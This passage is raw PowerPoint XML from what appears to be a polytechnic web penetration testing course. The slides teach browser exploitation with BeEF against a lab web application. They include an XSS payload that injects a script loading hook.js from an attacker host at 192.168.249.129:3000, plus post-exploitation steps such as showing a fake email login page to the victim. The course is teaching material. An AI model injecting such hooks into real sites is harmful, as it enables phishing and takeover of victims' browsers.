            <pc:sldMk cId="2346753269" sldId="1047"/>
            <ac:picMk id="2" creationId="{6B0E8EF4-64D9-492F-9AED-5BC4CF5285A0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{3F2BCB51-388F-CE4F-6F91-472241042393}" dt="2021-11-26T04:01:01.033" v="163" actId="688"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2514639792" sldId="1048"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{3F2BCB51-388F-CE4F-6F91-472241042393}" dt="2021-11-26T03:54:55.261" v="107"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2514639792" sldId="1048"/>
            <ac:spMk id="2" creationId="{866C6023-EE61-4B77-8B2F-E4FD0B83F7E6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{3F2BCB51-388F-CE4F-6F91-472241042393}" dt="2021-11-26T03:54:51.496" v="106"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2514639792" sldId="1048"/>
            <ac:spMk id="3" creationId="{A91CA3EB-F587-49F3-A842-07D0F0D9DB5A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{3F2BCB51-388F-CE4F-6F91-472241042393}" dt="2021-11-26T03:59:41.610" v="152" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2514639792" sldId="1048"/>
            <ac:spMk id="6" creationId="{5C7E8AA8-7309-4C7D-B350-6631A58D3067}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{3F2BCB51-388F-CE4F-6F91-472241042393}" dt="2021-11-26T04:01:01.033" v="163" actId="688"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2514639792" sldId="1048"/>
            <ac:spMk id="8" creationId="{00A69A20-9C6B-4D72-9A41-7A10382DC135}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{3F2BCB51-388F-CE4F-6F91-472241042393}" dt="2021-11-26T03:56:31.310" v="110"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2514639792" sldId="1048"/>
            <ac:spMk id="9" creationId="{78A2526D-DBA7-4D0C-8128-88E5507A1677}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{3F2BCB51-388F-CE4F-6F91-472241042393}" dt="2021-11-26T03:56:25.669" v="109"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2514639792" sldId="1048"/>
            <ac:picMk id="4" creationId="{77855EBC-E21B-42C4-8CD2-91C972E4DA11}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{3F2BCB51-388F-CE4F-6F91-472241042393}" dt="2021-11-26T03:58:33.468" v="130"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2514639792" sldId="1048"/>
            <ac:picMk id="5" creationId="{A81A83A5-5036-4005-AAD3-B7D83AB59267}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new">
        <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{3F2BCB51-388F-CE4F-6F91-472241042393}" dt="2021-11-26T04:54:48.494" v="329" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2318261988" sldId="1049"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{3F2BCB51-388F-CE4F-6F91-472241042393}" dt="2021-11-26T04:54:48.494" v="329" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318261988" sldId="1049"/>
            <ac:spMk id="2" creationId="{23FCB9C8-C5C9-484E-9793-059C3D2FEC70}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{3F2BCB51-388F-CE4F-6F91-472241042393}" dt="2021-11-26T04:54:35.243" v="326" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318261988" sldId="1049"/>
            <ac:spMk id="4" creationId="{ACADB30C-7F28-4A20-A4A2-D1C7A7AB8BC9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{68724CA2-324E-408F-BA33-9916C3163FF2}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{68724CA2-324E-408F-BA33-9916C3163FF2}" dt="2021-12-08T01:31:55.414" v="0" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{68724CA2-324E-408F-BA33-9916C3163FF2}" dt="2021-12-08T01:31:55.414" v="0" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2318261988" sldId="1049"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{68724CA2-324E-408F-BA33-9916C3163FF2}" dt="2021-12-08T01:31:55.414" v="0" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318261988" sldId="1049"/>
            <ac:spMk id="2" creationId="{23FCB9C8-C5C9-484E-9793-059C3D2FEC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EA0E-FACB-4798-9BDA-F9AAD17C7D9F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4D55-B56C-4DD5-BDDE-333B379BEA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7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0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  <a:uFillTx/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:uFillTx/>
              </a:rPr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90308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uFillTx/>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1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7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7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189" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:uFillTx/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914377" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:uFillTx/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371566" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:uFillTx/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828754" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:uFillTx/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285943" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:uFillTx/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743131" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:uFillTx/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200320" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:uFillTx/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657509" indent="0">
              <a:buNone/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1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uFillTx/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:uFillTx/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:uFillTx/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:uFillTx/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:uFillTx/>
              </a:rPr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Diploma in CSF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WAPT  AY21/22 Sem 5</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" alt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5080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uFillTx/>
              </a:rPr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636000" y="6642103"/>
            <a:ext cx="284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uFillTx/>
                <a:latin typeface="Arial Narrow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Last update: </a:t>
            </a:r>
            <a:fld id="{8ABEE5FE-1DE1-4424-9918-16A677C6523F}" type="datetime8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22/11/2022 12:55 PM</a:t>
            </a:fld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C5590DDD-6585-4C1F-803E-C9EDC7C753FD}" type="slidenum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‹#›</a:t>
            </a:fld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91A63-5DC8-40C0-979E-5606F14B9A11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Official Open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409764" y="6404404"/>
            <a:ext cx="70724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SG" sz="1200"/>
              <a:t>A7 - XXS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24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uFillTx/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uFillTx/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uFillTx/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lia.com/2021/01/27/failed-to-execute-default-web-browse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0" y="2133601"/>
            <a:ext cx="7772400" cy="210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Concept of Post-Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189785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CB9C8-C5C9-484E-9793-059C3D2FEC70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2933972" y="2254003"/>
            <a:ext cx="675249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https://linuxlia.com/2021/01/27/failed-to-execute-default-web-browser/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CADB30C-7F28-4A20-A4A2-D1C7A7AB8BC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="288969" y="835068"/>
            <a:ext cx="8801561" cy="4495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/>
              <a:t>IF your BEeF cannot work, please follow the steps in the below web site to rectify the errors...</a:t>
            </a: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231826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37956-7228-4D82-B0E8-360E1546C6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CB093-52A7-4D9D-820A-10E2F45C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1477473"/>
            <a:ext cx="9840671" cy="453404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0493704-2253-410F-8710-1FC693786645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408572" y="775368"/>
            <a:ext cx="8801561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Follow by this…</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/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044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0ECC0-94FF-4C6E-9DC7-8746CB927B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D135E-FF9D-4CB9-875E-9E58FA25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18" y="1862138"/>
            <a:ext cx="4402146" cy="3611736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DDD8D5-F6BD-4F44-996D-97E8464CC191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571410" y="787894"/>
            <a:ext cx="11256894" cy="4495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/>
              <a:t>Enter username “beef” and password=[password that you have previously entered]</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2000"/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90830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F84B3-2B8E-469E-B8EE-D6DDB9EC5F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8AFB2-7EA0-4940-A937-B3141794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00" y="1351114"/>
            <a:ext cx="8921467" cy="4731955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161EFE9-100A-434A-9CA8-4D7A2B936ACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483728" y="885825"/>
            <a:ext cx="8801561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After login …</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/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73487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1EBF9-2409-4AD6-A2CB-C12768A536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4B409-A5C5-4923-8258-D42664D7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53" y="1543050"/>
            <a:ext cx="7629525" cy="5314950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BC1440E-CE5D-4466-B9E3-76A88168E7B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462941" y="822834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a vulnerable web application…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227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0329C-3409-4E96-B4E5-34D8BAC430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ED00D-4E04-49E4-8473-8F24FA76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595438"/>
            <a:ext cx="8115300" cy="366712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6D7D8983-8944-45A0-8FCA-A37918466BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19025437">
            <a:off x="8800331" y="3054622"/>
            <a:ext cx="747252" cy="5186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FFFA-A130-453F-9581-9AF661F6C1F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387785" y="766763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on [Search] to find the vulnerable input textbox.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50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09741-FC51-4710-86A5-636BF64A10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DECE0-B3F5-48F3-9D32-52BE26FF6562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4161772" y="1677733"/>
            <a:ext cx="6563032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SG" b="1" dirty="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.249.129</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0"/>
              <a:t>:3000/hook.js"&gt;&lt;/script&gt;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5F13-95BD-4DC3-BE3C-ED5E33BE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185988"/>
            <a:ext cx="5706788" cy="3400620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8BE9F8C-B9A7-4F1A-9DD7-ECE05A22C221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563149" y="767219"/>
            <a:ext cx="10710276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 the script into the search textbox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the web application.. 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226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7B433-D446-443F-B453-9618AE122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06B68-1232-4631-91EA-42B40156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1743075"/>
            <a:ext cx="8736602" cy="421931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115A2E6-DD3C-4508-B3C3-F1FAF82BF628}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564585" y="892479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Browser hooked …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E6A91A2-420F-4518-9841-0488FFB8D452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19025437">
            <a:off x="4717873" y="3593406"/>
            <a:ext cx="747252" cy="5186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647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D1077-11BB-4E56-9D99-D818565C5C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78F7-83AD-46DC-9B63-5771FDEF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49" y="599162"/>
            <a:ext cx="7905750" cy="609600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F658F60-ACFC-456D-961A-39C3736B343D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="458500" y="917531"/>
            <a:ext cx="3039317" cy="4495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Details…</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If you can't see the details, just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>refresh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> your browser...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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888D3AA-EEC2-4349-85E3-1C5A432A2906}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19025437">
            <a:off x="4611790" y="1963241"/>
            <a:ext cx="747252" cy="5186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3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211B2-8401-415F-A570-106F28F53D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2E3CB-EDB4-402F-8288-F0DDEBFE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44" y="1547813"/>
            <a:ext cx="7990562" cy="45876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55ABB-CA2E-4CF9-81CB-51DF6B90408A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613253" y="814388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 around in the App…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0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/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is part of the Exploitation during the Testing phase.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342265" indent="-342265"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It consists of various activities that take advantage of the exploitation completed previously.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342265" indent="-342265"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742315" lvl="1" indent="-285115"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Carry out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authentication by-pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> using token obtained from previous exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342265" indent="-342265"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this session, we learn how to make use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to carry out exploitation and subsequent post exploitation activities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334002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F5B76-ED3A-4AFA-B539-E9B15417C4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A5CE75F-CE12-4748-B861-1CA648D4948D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375259" y="654485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browser’s activities as Post-Exploitation Activity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2BF67-AA19-4C7B-AE73-7989E755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11" y="1297303"/>
            <a:ext cx="9895470" cy="54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3E4F5-044E-4210-AF33-54D2977800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2F1B1-F498-4D62-A43E-C28C5A25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11" y="1"/>
            <a:ext cx="3543300" cy="66198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95E4E18-AAE0-4CF5-AD8A-0CD29E84D7A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5722377" y="4168877"/>
            <a:ext cx="629264" cy="3834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S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3010-5EAD-4A6E-B849-AA2F0EC157D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470721" y="1062038"/>
            <a:ext cx="3656371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Phishing as a Post-Exploitation Activity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951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96A08-6FD9-4ABC-A37B-50BDB164EB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5812B-178D-4D64-B8F9-D7318E38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96" y="1694841"/>
            <a:ext cx="9144000" cy="447040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BF1C7EF-28D3-4CD8-A41B-63205833FD44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325155" y="842375"/>
            <a:ext cx="8480642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fake email login page will appear in the victim’s browser!</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2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240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15B9503-0F23-4DFE-AD4E-849AEA54B062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902735" y="1053633"/>
            <a:ext cx="10408268" cy="4495800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t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so many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Post-Exploitation Activity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> one can do with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>penetrate into the victim’s machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and view the contents… some other listed below. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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Enjoy! But remember to do the right thing. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remember to get written permission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from the asset owner before testing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="280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90084-AD52-4DCB-A1E4-3DEC313B4E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A6D2D-9D0F-4029-B536-293CE6CA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54" y="2048520"/>
            <a:ext cx="7934437" cy="25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0" y="2133601"/>
            <a:ext cx="7772400" cy="210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Post-Exploitation using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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401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742" y="0"/>
            <a:ext cx="11988800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>Browser Attack using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1"/>
              <a:t>BeEF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265" indent="-342265"/>
            <a:r>
              <a:rPr lang="en-SG" b="0" err="1"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="0" dirty="0"/>
              <a:t> stands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser Exploitation Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="342265" indent="-342265"/>
            <a:r>
              <a:rPr lang="en-SG" b="0" dirty="0"/>
              <a:t>A powerful penetration testing tool that focuses on the web browser. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342265" indent="-342265"/>
            <a:r>
              <a:rPr lang="en-SG" b="0" dirty="0"/>
              <a:t>It can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="0"/>
              <a:t>used for both exploitation and post exploitation activities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342265" indent="-342265"/>
            <a:r>
              <a:rPr lang="en-SG" b="0" dirty="0"/>
              <a:t>Allows penetration tester to assess the security posture of a target environment by using client-side (browser) attack vectors. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342265" indent="-342265"/>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>Hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="0" dirty="0"/>
              <a:t> on browsers and use them as beachheads for launching directed command modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342265" indent="-342265"/>
            <a:endParaRPr lang="en-SG" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5312125"/>
            <a:ext cx="254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https://beefproject.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28933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C7E-4BA5-4622-B823-43A0969D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92" y="-135381"/>
            <a:ext cx="10515600" cy="1325559"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity 6.2.3 – Hands-on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E8FB300-61B9-474F-B7A5-DB4740977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084730"/>
            <a:ext cx="10871200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>In this activity, you will learn to carry out post exploitation attacks using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
